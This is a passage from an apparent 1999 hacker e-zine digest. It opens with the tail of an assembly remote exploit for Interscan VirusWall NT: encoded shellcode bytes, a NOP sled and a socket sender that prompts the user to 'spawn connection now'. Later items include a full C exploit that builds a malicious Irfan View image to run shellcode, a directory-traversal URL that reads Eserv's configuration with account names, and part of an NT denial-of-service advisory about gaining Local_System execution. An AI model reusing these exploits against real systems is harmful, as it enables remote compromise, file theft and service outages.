053h, 0ffh, 057h, 0f0h, 033h db 0c0h, 057h, 050h, 0b0h, 00ch, 0abh, 058h, 0abh, 040h, 0abh, 05fh, 048h db 050h, 057h, 056h, 0adh, 056h, 0ffh, 057h, 0c0h, 048h, 050h, 057h, 0adh db 056h, 0adh, 056h, 0ffh, 057h, 0c0h, 048h, 0b0h, 044h, 089h, 007h, 057h db 0ffh, 057h, 0c4h, 033h, 0c0h, 08bh, 046h, 0f4h, 089h, 047h, 03ch, 089h db 047h, 040h, 08bh, 006h, 089h, 047h, 038h, 033h, 0c0h, 066h, 0b8h, 001h db 001h, 089h, 047h, 02ch, 057h, 057h, 033h, 0c0h, 050h, 050h, 050h, 040h db 050h, 048h, 050h, 050h, 0adh, 056h, 033h, 0c0h, 050h, 0ffh, 057h, 0c8h db 0ffh, 076h, 0f0h, 0ffh, 057h, 0cch, 0ffh, 076h, 0fch, 0ffh, 057h, 0cch db 048h, 050h, 050h, 053h, 0ffh, 057h, 0f4h, 08bh, 0d8h, 033h, 0c0h, 0b4h db 004h, 050h, 0c1h, 0e8h, 004h, 050h, 0ffh, 057h, 0d4h, 08bh, 0f0h, 033h db 0c0h, 08bh, 0c8h, 0b5h, 004h, 050h, 050h, 057h, 051h, 050h, 0ffh, 077h db 0a8h, 0ffh, 057h, 0d0h, 083h, 03fh, 001h, 07ch, 022h, 033h, 0c0h, 050h db 057h, 0ffh, 037h, 056h, 0ffh, 077h, 0a8h, 0ffh, 057h, 0dch, 00bh, 0c0h db 074h, 02fh, 033h, 0c0h, 050h, 0ffh, 037h, 056h, 053h, 0ffh, 057h, 0f8h db 06ah, 050h, 0ffh, 057h, 0e0h, 0ebh, 0c8h, 033h, 0c0h, 050h, 0b4h, 004h db 050h, 056h, 053h, 0ffh, 057h, 0fch, 057h, 033h, 0c9h, 051h, 050h, 056h db 0ffh, 077h, 0ach, 0ffh, 057h, 0d8h, 06ah, 050h, 0ffh, 057h, 0e0h, 0ebh db 0aah, 050h, 0ffh, 057h, 0e4h, 090h, 0d2h, 0dch, 0cbh, 0d7h, 0dch, 0d5h db 0aah, 0abh, 099h, 0dah, 0ebh, 0fch, 0f8h, 0edh, 0fch, 0c9h, 0f0h, 0e9h db 0fch, 099h, 0deh, 0fch, 0edh, 0cah, 0edh, 0f8h, 0ebh, 0edh, 0ech, 0e9h db 0d0h, 0f7h, 0ffh, 0f6h, 0d8h, 099h, 0dah, 0ebh, 0fch, 0f8h, 0edh, 0fch db 0c9h, 0ebh, 0f6h, 0fah, 0fch, 0eah, 0eah, 0d8h, 099h, 0dah, 0f5h, 0f6h db 0eah, 0fch, 0d1h, 0f8h, 0f7h, 0fdh, 0f5h, 0fch, 099h, 0c9h, 0fch, 0fch db 0f2h, 0d7h, 0f8h, 0f4h, 0fch, 0fdh, 0c9h, 0f0h, 0e9h, 0fch, 099h, 0deh db 0f5h, 0f6h, 0fbh, 0f8h, 0f5h, 0d8h, 0f5h, 0f5h, 0f6h, 0fah, 099h, 0ceh db 0ebh, 0f0h, 0edh, 0fch, 0dfh, 0f0h, 0f5h, 0fch, 099h, 0cbh, 0fch, 0f8h db 0fdh, 0dfh, 0f0h, 0f5h, 0fch, 099h, 0cah, 0f5h, 0fch, 0fch, 0e9h, 099h db 0dch, 0e1h, 0f0h, 0edh, 0c9h, 0ebh, 0f6h, 0fah, 0fch, 0eah, 0eah, 099h db 0ceh, 0cah, 0d6h, 0dah, 0d2h, 0aah, 0abh, 099h, 0eah, 0f6h, 0fah, 0f2h db 0fch, 0edh, 099h, 0fbh, 0f0h, 0f7h, 0fdh, 099h, 0f5h, 0f0h, 0eah, 0edh db 0fch, 0f7h, 099h, 0f8h, 0fah, 0fah, 0fch, 0e9h, 0edh, 099h, 0eah, 0fch db 0f7h, 0fdh, 099h, 0ebh, 0fch, 0fah, 0efh, 099h, 09bh, 099h store dw ? db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h db 0fah, 0f4h, 0fdh, 0b7h, 0fch, 0e1h, 0fch, 099h, 0ffh, 0ffh, 0ffh, 0ffh db 060h, 045h, 042h, 000h, 00dh, 00ah sploit_length33 equ 794 sploit33: db 068h, 065h, 06ch, 06fh, 020h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 04bh, 08bh db 0c3h, 0bbh, 001h, 090h, 016h, 001h, 0c1h, 0ebh, 002h, 08bh, 0f8h, 033h db 0c0h, 050h, 048h, 090h, 050h, 059h, 0f2h, 0afh, 059h, 0b1h, 0c6h, 08bh db 0c7h, 048h, 080h, 030h, 099h, 0e2h, 0fah, 033h, 0f6h, 096h, 090h, 090h db 056h, 0ffh, 013h, 08bh, 0d0h, 0fch, 033h, 0c9h, 0b1h, 00bh, 049h, 032h db 0c0h, 0ach, 084h, 0c0h, 075h, 0f9h, 052h, 051h, 056h, 052h, 0b3h, 080h db 090h, 090h, 0ffh, 013h, 0abh, 059h, 05ah, 0e2h, 0ech, 032h, 0c0h, 0ach db 084h, 0c0h, 075h, 0f9h, 0b3h, 001h, 04bh, 090h, 056h, 0ffh, 013h, 08bh db 0d0h, 0fch, 033h, 0c9h, 0b1h, 006h, 032h, 0c0h, 0ach, 084h, 0c0h, 075h db 0f9h, 052h, 051h, 056h, 052h, 0b3h, 080h, 090h, 090h, 0ffh, 013h, 0abh db 059h, 05ah, 0e2h, 0ech, 083h, 0c6h, 005h, 033h, 0c0h, 050h, 040h, 050h db 040h, 050h, 0ffh, 057h, 0e8h, 093h, 06ah, 010h, 056h, 053h, 0ffh, 057h db 0ech, 06ah, 002h, 053h, 0ffh, 057h, 0f0h, 033h, 0c0h, 057h, 050h, 0b0h db 00ch, 0abh, 058h, 0abh, 040h, 0abh, 05fh, 048h, 050h, 057h, 056h, 0adh db 056h, 0ffh, 057h, 0c0h, 048h, 050h, 057h, 0adh, 056h, 0adh, 056h, 0ffh db 057h, 0c0h, 048h, 0b0h, 044h, 089h, 007h, 057h, 0ffh, 057h, 0c4h, 033h db 0c0h, 08bh, 046h, 0f4h, 089h, 047h, 03ch, 089h, 047h, 040h, 08bh, 006h db 089h, 047h, 038h, 033h, 0c0h, 066h, 0b8h, 001h, 001h, 089h, 047h, 02ch db 057h, 057h, 033h, 0c0h, 050h, 050h, 050h, 040h, 050h, 048h, 050h, 050h db 0adh, 056h, 033h, 0c0h, 050h, 0ffh, 057h, 0c8h, 0ffh, 076h, 0f0h, 0ffh db 057h, 0cch, 0ffh, 076h, 0fch, 0ffh, 057h, 0cch, 048h, 050h, 050h, 053h db 0ffh, 057h, 0f4h, 08bh, 0d8h, 033h, 0c0h, 0b4h, 004h, 050h, 0c1h, 0e8h db 004h, 050h, 0ffh, 057h, 0d4h, 08bh, 0f0h, 033h, 0c0h, 08bh, 0c8h, 0b5h db 004h, 050h, 050h, 057h, 051h, 050h, 0ffh, 077h, 0a8h, 0ffh, 057h, 0d0h db 083h, 03fh, 001h, 07ch, 022h, 033h, 0c0h, 050h, 057h, 0ffh, 037h, 056h db 0ffh, 077h, 0a8h, 0ffh, 057h, 0dch, 00bh, 0c0h, 074h, 02fh, 033h, 0c0h db 050h, 0ffh, 037h, 056h, 053h, 0ffh, 057h, 0f8h, 06ah, 050h, 0ffh, 057h db 0e0h, 0ebh, 0c8h, 033h, 0c0h, 050h, 0b4h, 004h, 050h, 056h, 053h, 0ffh db 057h, 0fch, 057h, 033h, 0c9h, 051h, 050h, 056h, 0ffh, 077h, 0ach, 0ffh db 057h, 0d8h, 06ah, 050h, 0ffh, 057h, 0e0h, 0ebh, 0aah, 050h, 0ffh, 057h db 0e4h, 090h, 0d2h, 0dch, 0cbh, 0d7h, 0dch, 0d5h, 0aah, 0abh, 099h, 0dah db 0ebh, 0fch, 0f8h, 0edh, 0fch, 0c9h, 0f0h, 0e9h, 0fch, 099h, 0deh, 0fch db 0edh, 0cah, 0edh, 0f8h, 0ebh, 0edh, 0ech, 0e9h, 0d0h, 0f7h, 0ffh, 0f6h db 0d8h, 099h, 0dah, 0ebh, 0fch, 0f8h, 0edh, 0fch, 0c9h, 0ebh, 0f6h, 0fah db 0fch, 0eah, 0eah, 0d8h, 099h, 0dah, 0f5h, 0f6h, 0eah, 0fch, 0d1h, 0f8h db 0f7h, 0fdh, 0f5h, 0fch, 099h, 0c9h, 0fch, 0fch, 0f2h, 0d7h, 0f8h, 0f4h db 0fch, 0fdh, 0c9h, 0f0h, 0e9h, 0fch, 099h, 0deh, 0f5h, 0f6h, 0fbh, 0f8h db 0f5h, 0d8h, 0f5h, 0f5h, 0f6h, 0fah, 099h, 0ceh, 0ebh, 0f0h, 0edh, 0fch db 0dfh, 0f0h, 0f5h, 0fch, 099h, 0cbh, 0fch, 0f8h, 0fdh, 0dfh, 0f0h, 0f5h db 0fch, 099h, 0cah, 0f5h, 0fch, 0fch, 0e9h, 099h, 0dch, 0e1h, 0f0h, 0edh db 0c9h, 0ebh, 0f6h, 0fah, 0fch, 0eah, 0eah, 099h, 0ceh, 0cah, 0d6h, 0dah db 0d2h, 0aah, 0abh, 099h, 0eah, 0f6h, 0fah, 0f2h, 0fch, 0edh, 099h, 0fbh db 0f0h, 0f7h, 0fdh, 099h, 0f5h, 0f0h, 0eah, 0edh, 0fch, 0f7h, 099h, 0f8h db 0fah, 0fah, 0fch, 0e9h, 0edh, 099h, 0eah, 0fch, 0f7h, 0fdh, 099h, 0ebh db 0fch, 0fah, 0efh, 099h, 09bh, 099h store2 dw ? db 099h, 099h, 099h, 099h db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 0fah, 0f4h, 0fdh, 0b7h db 0fch, 0e1h, 0fch, 099h, 0ffh, 0ffh, 0ffh, 0ffh, 009h, 01fh, 040h, 000h db 00dh, 00ah logo db "Interscan VirusWall NT 3.23/3.3 remote - http://www.beavuh.org for nfo.", 13, 10 db "by dark spyrit ",13,10,13,10 db "usage: vwxploit ", 13, 10 db "eg - vwxploit host.com 25 1234 3.23",13,10,0 logolen equ $-logo errorinit db 10,"error initializing winsock.", 13, 10, 0 errorinitl equ $-errorinit derror db 10,"error.",13,10,0 derrorl equ $-derror nohost db 10,"no host or ip specified.", 13,10,0 nohostl equ $-nohost noport db 10,"no port specified.",13,10,0 noportl equ $-noport no_port2 db 10,"no bind port specified.",13,10,0 no_port2l equ $-no_port2 response db 10,"waiting for response....",13,10,0 respl equ $-response reshost db 10,"error resolving host.",13,10,0 reshostl equ $-reshost sockerr db 10,"error creating socket.",13,10,0 sockerrl equ $-sockerr ipill db 10,"ip error.",13,10,0 ipilll equ $-ipill cnerror db 10,"error establishing connection.",13,10,0 cnerrorl equ $-cnerror success db 10,"sent.. spawn connection now.",13,10,0 successl equ $-success verzion db 10,"please specify a valid version.",13,10,0 verzionl equ $-verzion console_in dd ? console_out dd ? bytes_read dd ? wsadescription_len equ 256 wsasys_status_len equ 128 WSAdata struct wVersion dw ? wHighVersion dw ? szDescription db wsadescription_len+1 dup (?) szSystemStatus db wsasys_status_len+1 dup (?) iMaxSockets dw ? iMaxUdpDg dw ? lpVendorInfo dw ? WSAdata ends sockaddr_in struct sin_family dw ? sin_port dw ? sin_addr dd ? sin_zero db 8 dup (0) sockaddr_in ends wsadata WSAdata sin sockaddr_in sock dd ? numbase dd 10 version db 0 _port db 256 dup (?) _host db 256 dup (?) _port2 db 256 dup (?) buffer db 1000 dup (0) .code start: call init_console push logolen push offset logo call write_console call GetCommandLineA mov edi, eax mov ecx, -1 xor al, al push edi repnz scasb not ecx pop edi mov al, 20h repnz scasb dec ecx cmp ch, 0ffh jz @@0 test ecx, ecx jnz @@1 @@0: push nohostl push offset nohost call write_console jmp quit3 @@1: mov esi, edi lea edi, _host call parse or ecx, ecx jnz @@2 push noportl push offset noport call write_console jmp quit3 @@2: lea edi, _port call parse or ecx, ecx jnz @@3 push no_port2l push offset no_port2 call write_console jmp quit3 @@3: push ecx lea edi, _port2 call parse cmp dword ptr [esi], "32.3" jz ver1 cmp word ptr [esi+1], "3." jz ver2 push verzionl push offset verzion call write_console jmp quit3 ver1: inc version ver2: push offset wsadata push 0101h call WSAStartup or eax, eax jz winsock_found push errorinitl push offset errorinit call write_console jmp quit3 winsock_found: xor eax, eax push eax inc eax push eax inc eax push eax call socket cmp eax, -1 jnz socket_ok push sockerrl push offset sockerr call write_console jmp quit2 socket_ok: mov sock, eax mov sin.sin_family, 2 mov ebx, offset _port call str2num mov eax, edx push eax call htons mov sin.sin_port, ax mov ebx, offset _port2 call str2num mov eax, edx push eax call htons xor ax, 09999h mov store, ax mov store2, ax mov esi, offset _host lewp: xor al, al lodsb cmp al, 039h ja gethost test al, al jnz lewp push offset _host call inet_addr cmp eax, -1 jnz ip_aight push ipilll push offset ipill call write_console jmp quit1 ip_aight: mov sin.sin_addr, eax jmp continue gethost: push offset _host call gethostbyname test eax, eax jnz gothost push reshostl push offset reshost call write_console jmp quit1 gothost: mov eax, [eax+0ch] mov eax, [eax] mov eax, [eax] mov sin.sin_addr, eax continue: push size sin push offset sin push sock call connect or eax, eax jz connect_ok push cnerrorl push offset cnerror call write_console jmp quit1 connect_ok: push respl push offset response call write_console xor eax, eax push eax push 1000 push offset buffer push sock call recv or eax, eax jg sveet push derrorl push offset derror call write_console jmp quit1 sveet: push eax push offset buffer call write_console cmp version, 0 jz shell2 xor eax, eax push eax push sploit_length323 push offset sploit323 push sock jmp blah shell2: xor eax, eax push eax push sploit_length33 push offset sploit33 push sock blah: call send push 500 call Sleep push successl push offset success call write_console quit1: push sock call closesocket quit2: call WSACleanup quit3: push 0 call ExitProcess parse proc ;cheap parsing.. lewp9: xor eax, eax cld lodsb cmp al, 20h jz done test al, al jz done2 stosb dec ecx jmp lewp9 done: dec ecx done2: ret endp str2num proc push eax ecx edi xor eax, eax xor ecx, ecx xor edx, edx xor edi, edi lewp2: xor al, al xlat test al, al jz end_it sub al, 030h mov cl, al mov eax, edx mul numbase add eax, ecx mov edx, eax inc ebx inc edi cmp edi, 0ah jnz lewp2 end_it: pop edi ecx eax ret endp init_console proc push -10 call GetStdHandle or eax, eax je init_error mov [console_in], eax push -11 call GetStdHandle or eax, eax je init_error mov [console_out], eax ret init_error: push 0 call ExitProcess endp write_console proc text_out:dword, text_len:dword pusha push 0 push offset bytes_read push text_len push text_out push console_out call WriteConsoleA popa ret endp end start knight, siezer, oeb, lusta, infidel, devious, werd to #9x #darkcyde #phunc #b4b0 #2600 #2600-uk & wErd to D4RKCYDE. @HWA 46.0 The Xnews guid ~~~~~~~~~~~~~~ From the home page http://xnews.3dnews.net/ All the talks about the PIII's ID code and Win98's Global Unique ID remind me of Xnews' own IDToken. From the manual: This is a string Xnews embeds in Message-ID in order to track your posts and alert you to replies to your articles. You can use any string of letters and numbers. I use my email without the @ and . luutrangeocities. The idea is to use a string that noone else is likely to use. By default, I generate this string by taking your email address and strip out the . and @. In retrospect, maybe this was not such a good idea as some users who go through great length to hide their email may not appreciate having it embedded inside Message-ID and References headers (albeit in an altered form). But, you can change this to anything you like, including using a seemingly random string of letters and numbers. And if you're really paranoid, just delete it (just use empty string). You'll lose the convenience of having Xnews flag replies to your posts, of course. [By the way, if your news server does not accept client-generated message ids, this entire discussion is moot.] Anyway, I just want Xnews users to be aware of this issue. I don't want people to be caught by surprise then flaming me. This is really a feature designed to help you, not some lame corporate attempt to track you for marketing purposes. @HWA 47.0 BUFFER OVERFLOW IN IMG VIEWER ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Monday 6th November 1999 on 11:02 pm CET The popular Image viewer "Irfan View32" contains the buffer overflow problem, this problem exists in the handling of Adobe Photoshop image file. Irfan view checks the image type by the image header, if "8BPS" pattern is found in the header, Irfan view judges this file as Photo Shop image. The overflow happens at the handling of reading this marker. Cool one, isn't it:). Link: Packet Storm http://packetstorm.securify.com/9911-exploits/irfan.view32.txt The popular Image viewer "Irfan View32" contains the buffer overflow problem, this problem exists in the handling of Adobe Photoshop image file. Irfan view checks the image type by the image header, if "8BPS" pattern is found in the header, Irfan view judges this file as Photo Shop image. We think the overflow happens at the handling of reading this marker. You can see the GPF dialog box by the following file. 8BPSaaaaaaaaaaaaaa .... long 'a' #You can make this file by notepad.exe This overflow is exploitable if the appropriate value is stored in the stack area, any codes such as virus, trojans, destruction code, which is stored in the image file can be executed. This fact means that the danger also exists on downloding the image files and viewing them. Of course, there is a possibility of such danger also in other software such as movie players, audio players. We coded the following sample codes. This code generates the jpg file which contains the exploit code that generates "exp.com" in "c:\" and executes it("exp.com" is a simple demo program, there is no danger). This is tested on Japanese Windows98 only. --- /*============================================================================= Irfan View 3.07 Exploit The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) ============================================================================= */ #include #include #include #define MAXBUF 0x22e0 #define RETADR 0x31E #define FAKE_ADR 0x80101010 // Writable buffer pointer #define JMPESP_ADR 0xbffca4f7 // You have to change this value // for non-Japanese Windows98. #define HEAD "8BPS\0" unsigned char exploit_code[300]={ 0xEB,0x4F,0x5F,0x32,0xC0,0x88,0x47,0x0A,0x88,0x47,0x10,0x88,0x47,0x17,0x88,0x47, 0x1E,0x88,0x47,0x23,0x88,0x47,0x26,0x88,0x47,0x2D,0x88,0x47,0x3C,0x57,0xB8,0x50, 0x77,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xDB,0xB3,0x0B,0x8B,0xC7,0x03,0xC3,0x50, 0x56,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xC8,0x33,0xDB,0xB3,0x24,0x8B,0xC7, 0x03,0xC3,0x50,0xB3,0x32,0x8B,0xC7,0x03,0xC3,0x50,0xFF,0xD1,0x89,0x47,0x2E,0xEB, 0x02,0xEB,0x71,0x33,0xDB,0xB3,0x18,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E, 0xF7,0xBF,0xFF,0xD0,0x8B,0xC8,0x8B,0x47,0x2E,0x50,0x33,0xC0,0xB0,0x03,0x90,0x90, 0x50,0xB0,0x01,0x50,0x33,0xDB,0xB3,0x3D,0x03,0xDF,0x53,0xFF,0xD1,0x33,0xDB,0xB3, 0x11,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0x5F, 0x2E,0x53,0xFF,0xD0,0x33,0xDB,0xB3,0x27,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28, 0x6E,0xF7,0xBF,0xFF,0xD0,0x33,0xDB,0xB3,0x32,0x8B,0xCF,0x03,0xCB,0x51,0xFF,0xD0, 0x33,0xDB,0x53,0xB3,0x1F,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,0xF7,0xBF, 0xFF,0xD0,0xFF,0xD0,0xE8,0x39,0xFF,0xFF,0xFF,0x00 }; s // "exp.com" unsigned char exploit_data[1000]={ 0xb0,0x13,0xcd,0x10,0xb0,0x0f,0xfe,0xc0,0xb4,0x0c,0xcd,0x10,0x03,0xd1,0x41,0x3c, 0x20,0x77,0xf1,0xeb,0xf1,0x00 }; int GetProcAddress_fcp[4]={0x32,0x5e,0x88,0xbc}; char string_buffer[1000] ="msvcrt.dll_fopen_fclose_fwrite_exit_wb_system_****"; char filename[100] = "c:\\exp.com"; main(int argc,char *argv[]) { unsigned char buf[MAXBUF],l1,l2; unsigned int ip,p1,p2,i; FILE *fp; if (argc<2){ printf("usage : %s outputfile\n",argv[0]); exit(1); } memset(buf,0x90,MAXBUF); buf[MAXBUF]=0; memcpy(buf,HEAD,4); ip=JMPESP_ADR; buf[RETADR ]=ip&0xff; buf[RETADR+1]=(ip>>8)&0xff; buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=(ip>>24)&0xff; buf[RETADR+6]=0xeb; buf[RETADR+7]=0x04; ip=FAKE_ADR; buf[RETADR+8]=ip&0xff; buf[RETADR+9]=(ip>>8)&0xff; buf[RETADR+10]=(ip>>16)&0xff; buf[RETADR+11]=(ip>>24)&0xff; p1=(unsigned int)LoadLibrary; p2=(unsigned int)GetProcAddress; exploit_code[0x1f]=p1&0xff; exploit_code[0x20]=(p1>>8)&0xff; exploit_code[0x21]=(p1>>16)&0xff; exploit_code[0x22]=(p1>>24)&0xff; for (i=0;i<4;i++){ exploit_code[GetProcAddress_fcp[i] ]=p2&0xff; exploit_code[GetProcAddress_fcp[i]+1]=(p2>>8)&0xff; exploit_code[GetProcAddress_fcp[i]+2]=(p2>>16)&0xff; exploit_code[GetProcAddress_fcp[i]+3]=(p2>>24)&0xff; } l1=strlen(filename)+strlen(string_buffer); l2=strlen(exploit_data); strcat(string_buffer,filename ); strcat(string_buffer,"_" ); strcat(string_buffer,exploit_data ); strcat(exploit_code, string_buffer ); exploit_code[0x1c] = l1; exploit_code[0x6d] = l2; exploit_code[0x77] = l1+1; memcpy(buf+RETADR+12,exploit_code,strlen(exploit_code)); if ((fp=fopen(argv[1],"wb"))==NULL){ printf("Can not write file '%s'\n",argv[1]); exit(1); } fwrite(buf,1,MAXBUF,fp); fclose(fp); printf("Done.\n"); return FALSE; } ----- UNYUN % The Shadow Penguin Security [ http://shadowpenguin.backsection.net ] shadowpenguin@backsection.net (webmaster) % eEye Digital Security Team [ http://www.eEye.com ] unyun@eEye.com @HWA 48.0 Eserv 2.50 Web interface Server Directory Traversal Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://packetstorm.securify.com/ From owner-news@technotronic.com Thu Nov 4 22:28:55 1999 Return-Path: Received: from sword.damocles.com([209.100.46.1]) (3359 bytes) by packetstorm.securify.com via sendmail with P:esmtp/D:user/T:local (sender: ) id for ; Thu, 4 Nov 1999 22:28:53 -0800 (PST) (Smail-3.2.0.106 1999-Mar-31 #1 built 1999-Sep-18) Received: (from technomail@localhost) by sword.damocles.com (8.9.1a/8.9.1) id UAA16404 for news-resend-technotroniccom; Thu, 4 Nov 1999 20:42:27 -0600 X-Authentication-Warning: sword.damocles.com: technomail set sender to owner-news@technotronic.com using -f Received: from sword.damocles.com (vacuum@sword.damocles.com [209.100.46.1]) by sword.damocles.com (8.9.1a/8.9.1) with SMTP id UAA16399 for ; Thu, 4 Nov 1999 20:42:25 -0600 Date: Thu, 4 Nov 1999 20:42:25 -0600 (CST) From: Vacuum X-Sender: vacuum@sword.damocles.com To: news@technotronic.com Subject: Eserv 2.50 Web interface Server Directory Traversal Vulnerability Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-news@technotronic.com Precedence: bulk Status: RO ---------- Forwarded message ---------- Date: Thu, 4 Nov 1999 18:26:52 -0600 From: owner-news@technotronic.com To: owner-news@technotronic.com Subject: BOUNCE news@technotronic.com: Approval required: >From vacuum@sword.damocles.com Thu Nov 4 18:26:51 1999 Received: from ussrback.com (jupiter.hosting4u.net [209.15.2.9]) by sword.damocles.com (8.9.1a/8.9.1) with SMTP id SAA05681 for ; Thu, 4 Nov 1999 18:26:46 -0600 Received: from luck ([200.41.64.206]) by ussrback.com ; Fri, 05 Nov 1999 00:26:32 -0600 From: "Ussr Labs" To: "TECHNOTRONIC" Subject: Eserv 2.50 Web interface Server Directory Traversal Vulnerability Date: Thu, 4 Nov 1999 21:20:35 -0300 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Eserv 2.50 Web interface Server Directory Traversal Vulnerability Product: Eserv/2.50 is the complete solution to access Internet from LAN: - Mail Server (SMTP and POP3, with ability to share one mailbox on the ISP, aliases and mail routing support) - News Server (NNTP) - Web Server (with CGI, virtual hosts, virtual directory support, web-interface for all servers in the package) - FTP Server (with virtual directory support) - Proxy Servers * FTP proxy and HTTP caching proxy * FTP gate * HTTPS proxy * Socks5, Socks4 and 4a proxy * TCP and UDP port mapping * DNS proxy - Finger Server - Built-in scheduler and dialer (dial on demand, dialer server for extern agents, scheduler for any tasks) PROBLEM UssrLabs found a Eserv Web Server Directory Traversal Vulnerability Using the string '../' in a URL, an attacker can gain read access to any file outside of the intended web-published filesystem directory There is not much to expand on this one.... Example: http://127.1:3128/../../../conf/Eserv.ini to show all configuration file including account names Vendor Status: no contacted Vendor Url: http://www.eserv.ru/ Program Url: http://www.eserv.ru/eserv/ Credit: USSRLABS SOLUTION Nothing yet. @HWA 49.0 RFP9906 - RFPoison ~~~~~~~~~~~~~~~~~~ From http://packetstorm.securify.com/ From rfp@wiretrip.net Mon Nov 1 09:20:06 1999 Date: Mon, 1 Nov 1999 08:18:50 -0600 (EST) From: ".rain.forest.puppy." To: vacuum@technotronic.com, thegnome@nmrc.org Subject: RFP9906 - RFPoison --- Advisory RFP9906 ----------------------------- rfp.labs ----------- Windows NT remote denial of service and compromise (RFPoison) ------------------------------ rain forest puppy / rfp@wiretrip.net --- Table of contents: - 1. Problem - 2. Solution - 3. Where to Get This Weapon of Mass Destruction - 4. Miscellanous Updates (Important stuff!) ----------------------------------------------------------------------- My website has been launched! Up to the minute advisories, tools, (and code fixes...heh) are available from http://www.wiretrip.net/rfp/ ----------------------------------------------------------------------- ----[ 1. Problem Interesting on how things go around/come around. Recently Luke Kenneth Casson Leighton posted a message on NTBugtraq in response to SP6 not fixing the LSA denial of service. He states that this problem is essentially "due to marshalling/unmarshalling MSRPC code being unable to cope with a NULL policy handle." He also states that they reported this problem to Microsoft around February 1999. Well, no, I did not 'rediscover' the LSA denial of service (ala the AEDebug advisory earlier this month). I did, however, discover a different denial of service based out of services.exe. When sent a specific packet, it's possible to get srvsvc.dll to choke, and cause services.exe to reference a bad memory location. For those geeks in the crowd, essentially srvsvc_netrshareenum in srvsvc.dll uses rpcrt4_ndrcomplexstructunmarshall to tweak a string, but returns a NULL. srvsvc_netrshareenum doesn't check for return value, adds four to the pointer, and passes it up a function stack until finally that memory is read (address 00000004). Blam...Dr. Watson. So we have another problem due to marshalling/unmarshalling MSRPC code. This was found independantly of Luke's info and the LSA vulnerability. The impact is pretty severe. Services.exe handles named pipes for the system. Once this crashes, everything named-pipe-based goes with it. This means logons, logouts, remote system access (registry, server functions, etc), local server management, IIS, file sharing, etc...all go down the tube. However, the box will, for the most part, appear to function normally on the local side, until you do something involving a named pipe service. The only fix is to reboot...however, the shutdown procedure waits for every (non-existant) service to respond to shutdown, and timeout. On a typical box this could cause the full shutdown procedure to push over a half-hour; therefore, hard reset is most likely needed. Also, once in a great while the bug will 'survive' during a reset. It may take two reboots to get the system back in order. Strange, yes. How, I'm not sure. But it's happened over a half dozen times across four separate boxes I've tested on. Now, I'm sure some of you are thinking "well, denial of services suck. How can I own .gov and .mil websites with this?" (hi flipz and fuqrag) Well, let's go back to David LeBlanc's response to RFP9903 (AEDebug advisory). He states, for AEDebug to really be a problem, you have to "make something crash that has higher access rights than you do." He also states "you've got to make a service go down that won't kill the machine." Bingo, this fits the bill. If we have access to change the AEDebug registry key, we can set what programs to run on crash, set autorun to True, and then crash services.exe. Our programs run as Local_System, the box is still alive (TCP/IP-wise) and usable via netcat and whatnot. A much more useful situation for a denial of service, don't you think? Also, Eric Schultze has detailed out many situations where someone could have access to your AEDebug key. I suggest you read his tidbit. It's posted as document 11 in the knowledge base on my website, available at http://www.wiretrip.net/rfp/ So far, I have been able to use this exploit on NT 4.0 server and workstation, with various levels of SP 1, 3, 5, and 6 service packs installed. I even tried applying SP 5 with the following hotfixes (in the following order): lsareq, ipsrfix, csrssfx, ioctlfx, and igmpfix. I've also tried using the Security Configuration Editor on various different 'secure' system profiles, testing to see if perhaps a registry key affected it. After all modifications, the systems were still susceptible. HOWEVER, I do have reports of two boxes *NOT* being susceptible. The 